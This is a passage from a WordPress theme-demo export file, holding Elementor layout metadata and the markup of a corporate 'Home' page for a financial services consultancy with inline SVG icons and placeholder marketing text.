:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:7;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:4;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:2;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:4;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[300]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Home</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/</link>
		<pubDate>Tue, 22 Sep 2020 03:28:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=1023</guid>
		<description></description>
		<content:encoded><![CDATA[<h6>financial services solutions</h6>		
			<h2>We Deliver Digital<br> Strategy & Analytics</h2>		
		<p>We are boutique firm designed for Private Equity, Family Offices, and<br />Growth-Stage Companies seeking to maximize results</p>		
			<a href="#">Explore More </a>
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Have Any Questions?</a></h5>				<p>+1-800-456-478-23</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>	        
				<h5><a href="#">Financial Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Government Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512.01 512.01"><g><path d="m479.659 248.51h-72.427l27.649-15.963c15.448-8.919 20.76-28.743 11.841-44.191l-85.052-147.317-1.922-3.329-12.424-21.52c-4.32-7.483-11.297-12.836-19.644-15.073-8.349-2.238-17.065-1.088-24.548 3.232l-154.14 88.993c-3.587 2.071-4.816 6.658-2.745 10.245s6.658 4.817 10.245 2.745l154.14-88.993c8.284-4.782 18.917-1.935 23.701 6.351l8.675 15.025-316.994 183.016-8.675-15.026c-2.317-4.013-2.933-8.689-1.733-13.166 1.2-4.476 4.07-8.217 8.084-10.535l105.905-61.144c3.587-2.071 4.816-6.658 2.745-10.245s-6.658-4.817-10.245-2.745l-105.906 61.145c-7.483 4.32-12.836 11.296-15.073 19.643-2.236 8.346-1.089 17.064 3.232 24.547l12.423 21.517c.001.001.001.003.002.004l12.425 21.521 74.55 129.125c2.93 5.074 7.173 9.228 12.228 12.056v81.232c0 17.838 14.512 32.35 32.35 32.35h226.715c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-226.714c-9.567 0-17.35-7.783-17.35-17.35v-85.724c.004-.085-.001-.168 0-.253v-112.823c0-9.567 7.783-17.35 17.35-17.35h230.9c.008 0 .015.001.023.001.007 0 .015-.001.023-.001h100.387c9.567 0 17.351 7.783 17.351 17.35v198.8c0 9.567-7.783 17.35-17.351 17.35h-74.616c-4.143 0-7.5 3.358-7.5 7.5s3.357 7.5 7.5 7.5h74.616c17.838 0 32.351-14.512 32.351-32.35v-198.8c-.001-17.838-14.514-32.35-32.352-32.35zm-129.151-196.805 2.637 4.568 6.429 11.136-316.993 183.017-9.067-15.704zm-234.531 229.155v96.692l-65.897-114.136 316.994-183.017 66.658 115.456c4.783 8.285 1.934 18.917-6.351 23.701l-50.149 28.954h-228.905c-17.838 0-32.35 14.512-32.35 32.35z"></path><path d="m389.037 154.707c-2.07-3.587-6.66-4.816-10.245-2.745l-71.736 41.417c-3.587 2.071-4.816 6.658-2.745 10.245 1.389 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006l71.736-41.417c3.587-2.071 4.816-6.658 2.745-10.245z"></path><path d="m402.858 193.646c3.587-2.071 4.816-6.658 2.745-10.245s-6.66-4.816-10.245-2.745l-28.694 16.567c-3.587 2.071-4.816 6.658-2.745 10.245 1.39 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006z"></path><path d="m363.409 346.343h83.4c8.547 0 15.5-6.953 15.5-15.5v-17.133c0-8.547-6.953-15.5-15.5-15.5h-83.4c-8.547 0-15.5 6.953-15.5 15.5v17.133c0 8.547 6.953 15.5 15.5 15.5zm-.5-32.633c0-.276.225-.5.5-.5h83.4c.275 0 .5.224.5.5v17.133c0 .276-.225.5-.5.5h-83.4c-.275 0-.5-.224-.5-.5z"></path><path d="m246.943 347.41v-50.267c0-8.547-6.953-15.5-15.5-15.5h-66.833c-8.547 0-15.5 6.953-15.5 15.5v50.267c0 8.547 6.953 15.5 15.5 15.5h66.833c8.547 0 15.5-6.953 15.5-15.5zm-15-50.267v17.633h-26.417v-18.133h25.917c.276 0 .5.224.5.5zm-67.333-.5h25.917v18.133h-26.417v-17.633c0-.276.224-.5.5-.5zm-.5 50.767v-17.633h67.833v17.633c0 .276-.224.5-.5.5h-66.833c-.276 0-.5-.224-.5-.5z"></path><path d="m156.61 430.743c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5h33.133c4.142 0 7.5-3.358 7.5-7.5s-3.358-7.5-7.5-7.5z"></path><path d="m222.876 445.743h99.4c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-99.4c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path><path d="m355.409 445.743h49.7c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-49.7c-4.143 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path></g></svg>	        
				<h5><a href="#">Consumer Products</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m456.907 161.731-36.977-14.932c-5.967-2.408-12.25-3.628-18.678-3.628-.03 0-.06 0-.09 0l-24.136.04-20.518-19.911c5.611-3.677 9.33-10.01 9.33-17.204 0-11.34-9.227-20.567-20.567-20.567h-26.483c-.377 0-.745.037-1.107.091l-83.802-81.325c-2.83-2.748-6.562-4.263-10.51-4.267l-42.989-.028c-.002 0-.004 0-.005 0-3.635 0-7.013 1.96-8.815 5.118-1.804 3.158-1.774 7.065.075 10.194l75.651 128.099-41.77.065c-1.196.001-2.404.092-3.59.27-.059.009-.118.018-.177.029l-70.077 12.26-49.75-37.177c-2.049-1.533-4.583-2.376-7.139-2.376-.008 0-.016 0-.023 0l-24.191.042c-3.835.008-7.347 2.111-9.164 5.488s-1.637 7.465.468 10.667l34.021 51.798-33.842 51.918c-2.094 3.213-2.258 7.302-.427 10.673 1.827 3.363 5.337 5.45 9.161 5.45h.021l24.19-.042c2.566-.005 5.106-.857 7.149-2.397l49.624-37.352 70.119 12.016c.061.011.123.02.185.029 1.18.171 2.397.244 3.577.257l41.861-.065-37.682 63.807c-6.849-3.421-10.843-6.886-12.607-8.651-1.956-1.955-3.795-4.086-5.467-6.335-3.195-4.301-8.101-6.773-13.46-6.787-.015 0-.028 0-.042 0-5.355 0-10.271 2.457-13.49 6.745-1.672 2.226-3.536 4.371-5.544 6.377-6.604 6.605-22.881 17.722-57.691 17.975l-11.326.082c-6.876.05-12.471 5.685-12.471 12.562v40.948c0 4.109 3.33 7.439 7.439 7.439s7.439-3.33 7.439-7.439v-38.647l9.027-.066c40.116-.292 59.888-14.117 68.103-22.331 2.501-2.501 4.829-5.181 6.922-7.967.521-.694 1.22-.8 1.593-.8h.005c.445.002 1.075.139 1.556.786 2.104 2.828 4.421 5.513 6.886 7.979 6.615 6.614 26.491 22.031 68.105 22.333l9.027.066v73.838c0 14.933-3.471 29.913-10.038 43.322s-16.273 25.336-28.07 34.493l-37.26 28.918c-2.961 2.297-6.503 3.511-10.245 3.511s-7.284-1.214-10.243-3.51l-37.261-28.919c-11.796-9.156-21.503-21.083-28.07-34.493-6.566-13.409-10.038-28.389-10.038-43.322 0-4.109-3.33-7.439-7.439-7.439s-7.439 3.33-7.439 7.439c0 17.188 3.995 34.432 11.554 49.866 7.559 15.435 18.731 29.163 32.308 39.702l37.262 28.919c5.513 4.278 12.39 6.635 19.364 6.635s13.852-2.357 19.366-6.636l37.261-28.918c13.578-10.538 24.749-24.267 32.308-39.702s11.554-32.678 11.554-49.866v-76.137c0-6.877-5.595-12.511-12.471-12.562l-11.326-.082c-12.598-.091-22.805-1.715-30.964-3.98l40.855-69.179 91.634-.143-61.47 59.654c-2.947 2.861-3.018 7.57-.157 10.519 1.459 1.502 3.398 2.258 5.339 2.258 1.866 0 3.735-.698 5.18-2.101l10.856-10.535h29.081c11.34 0 20.567-9.226 20.567-20.566 0-7.553-4.105-14.151-10.19-17.727l22.191-21.535 23.463-.037c6.462-.012 12.773-1.254 18.756-3.695l36.925-15.059c9.181-3.745 14.875-12.23 14.857-22.145-.011-9.916-5.734-18.383-14.927-22.095zm-111.636 96.602c3.137 0 5.69 2.552 5.69 5.69 0 3.136-2.552 5.689-5.69 5.689h-13.751l11.724-11.378h2.027zm0-157.927c3.137 0 5.69 2.552 5.69 5.69 0 3.137-2.552 5.69-5.69 5.69h-.629l-11.726-11.379h12.355zm106.094 91.789-36.925 15.059c-4.2 1.712-8.628 2.585-13.163 2.593l-195.645.306c-.003 0-.007 0-.01 0-.442 0-.886-.03-1.325-.09l-73.178-12.541c-2.016-.346-4.092.156-5.73 1.389l-51.403 38.691-14.976.025 32.007-49.102c1.615-2.477 1.609-5.675-.015-8.146l-32.177-48.991 14.975-.025 51.538 38.513c1.643 1.226 3.719 1.72 5.734 1.369l73.138-12.796c.438-.062.882-.093 1.325-.094l113.263-.177c4.109-.007 7.434-3.342 7.427-7.45-.007-4.105-3.336-7.427-7.439-7.427-.004 0-.008 0-.012 0l-54.228.085-75.886-128.503 34.698.022c.06 0 .116.022.159.064l132.182 128.277-1.783.003c-4.108.007-7.433 3.343-7.426 7.451.007 4.104 3.336 7.426 7.439 7.426h.013l47.247-.078h.063c4.512 0 8.923.857 13.109 2.546l36.976 14.931c5.212 2.105 5.625 6.904 5.628 8.325 0 1.421-.396 6.222-5.6 8.345z"></path><path d="m234.902 173.999c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.325-4.324-9.639-9.649-9.635z"></path><path d="m270.583 173.976c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.324-4.323-9.638-9.649-9.635z"></path><path d="m305.624 173.954c-5.325.003-9.639 4.323-9.636 9.648s4.323 9.639 9.648 9.635c5.325-.003 9.639-4.323 9.635-9.648-.003-5.325-4.322-9.639-9.647-9.635z"></path><path d="m341.305 173.931c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.005-5.324-4.324-9.638-9.649-9.635z"></path><path d="m150.203 316.284c-10.855 3.962-22.954 6.715-35.961 8.183-5.408.611-9.486 5.179-9.486 10.628v51.148c0 27.281 12.36 52.522 33.911 69.248l32.996 25.608c1.932 1.501 4.247 2.251 6.562 2.251s4.629-.75 6.559-2.249l32.997-25.61c21.551-16.726 33.912-41.965 33.912-69.248v-51.148c0-5.45-4.08-10.02-9.487-10.628-13.006-1.467-25.105-4.221-35.96-8.183-7.22-2.635-13.734-5.768-19.359-9.314-5.262-3.318-12.062-3.317-17.324-.001-5.627 3.546-12.14 6.681-19.36 9.315zm28.749 3.271c6.519 4.109 13.986 7.71 22.193 10.706 10.908 3.98 22.892 6.847 35.67 8.534v47.448c0 22.652-10.262 43.608-28.157 57.495l-30.435 23.621-30.435-23.621c-17.894-13.888-28.156-34.843-28.156-57.495v-47.448c12.779-1.687 24.761-4.553 35.67-8.534 8.209-2.996 15.676-6.598 22.193-10.706.449-.283 1.008-.283 1.457 0z"></path><path d="m145.068 374.175c-3.261 2.498-3.88 7.167-1.382 10.429l23.844 31.134c1.397 1.823 3.557 2.899 5.854 2.915h.051c2.278 0 4.431-1.044 5.843-2.835l43-54.567c2.543-3.226 1.989-7.904-1.239-10.446-3.224-2.543-7.904-1.988-10.446 1.239l-37.073 47.046-18.023-23.533c-2.497-3.26-7.164-3.879-10.429-1.382z"></path></g></svg>	        
				<h5><a href="#">Airlines & Transport</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
										<img width="736" height="500" src="https://maxbizz.s3.amazonaws.com/images/image2-home4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image2-home4.jpg 736w, https://maxbizz.s3.amazonaws.com/images/image2-home4-300x204.jpg 300w" sizes="(max-width: 736px) 100vw, 736px" />											
	        innovative solutions	        <h3>Transform Your  Ideas into a Product</h3>	    
		<p>The main goal of company is to spread a culture of sustainable development and synergy between the private sector, public sector and civil society.</p>		
